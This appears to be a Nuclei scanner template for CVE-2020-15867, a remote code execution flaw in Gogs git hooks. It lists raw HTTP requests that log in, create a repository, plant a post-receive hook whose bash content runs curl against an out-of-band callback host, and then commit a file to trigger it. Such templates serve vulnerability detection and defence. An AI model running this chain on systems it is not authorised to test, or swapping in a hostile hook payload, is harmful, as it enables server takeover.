98 lines
2.9 KiB
YAML
98 lines
2.9 KiB
YAML
id: CVE-2020-15867
|
|
|
|
info:
|
|
name: Gogs Git Hooks - Remote Code Execution
|
|
author: theamanrawat
|
|
severity: high
|
|
description: |
|
|
The git hook feature in Gogs 0.5.5 through 0.12.2 allows for authenticated remote code execution. There can be a privilege escalation if access to this hook feature is granted to a user who does not have administrative privileges.
|
|
reference:
|
|
- https://packetstormsecurity.com/files/162123/Gogs-Git-Hooks-Remote-Code-Execution.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-15867
|
|
- https://www.fzi.de/en/news/news/detail-en/artikel/fsa-2020-3-schwachstelle-in-gitea-1125-und-gogs-0122-ermoeglicht-ausfuehrung-von-code-nach-authent/
|
|
- http://packetstormsecurity.com/files/162123/Gogs-Git-Hooks-Remote-Code-Execution.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 7.2
|
|
cve-id: CVE-2020-15867
|
|
metadata:
|
|
verified: "true"
|
|
tags: cve,cve2020,rce,gogs,git,authenticated,packetstorm
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /user/login HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
POST /user/login HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}
|
|
|
|
- |
|
|
GET /repo/create HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
POST /repo/create HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
_csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&private=on&description=&gitignores=&license=&readme=Default&auto_init=on
|
|
|
|
- |
|
|
POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
_csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}
|
|
|
|
- |
|
|
GET /{{username}}/{{randstr}}/_new/master HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
POST /{{username}}/{{randstr}}/_new/master HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct
|
|
|
|
cookie-reuse: true
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "http"
|
|
|
|
- type: word
|
|
part: body_1
|
|
words:
|
|
- 'content="Gogs'
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: csrf
|
|
group: 1
|
|
regex:
|
|
- 'name="_csrf" value="(.*)"'
|
|
internal: true
|
|
|
|
- type: regex
|
|
name: auth_csrf
|
|
group: 1
|
|
regex:
|
|
- 'name="_csrf" content="(.*)"'
|
|
internal: true
|
|
|
|
- type: regex
|
|
name: last_commit
|
|
group: 1
|
|
regex:
|
|
- 'name="last_commit" value="(.*)"'
|
|
internal: true
|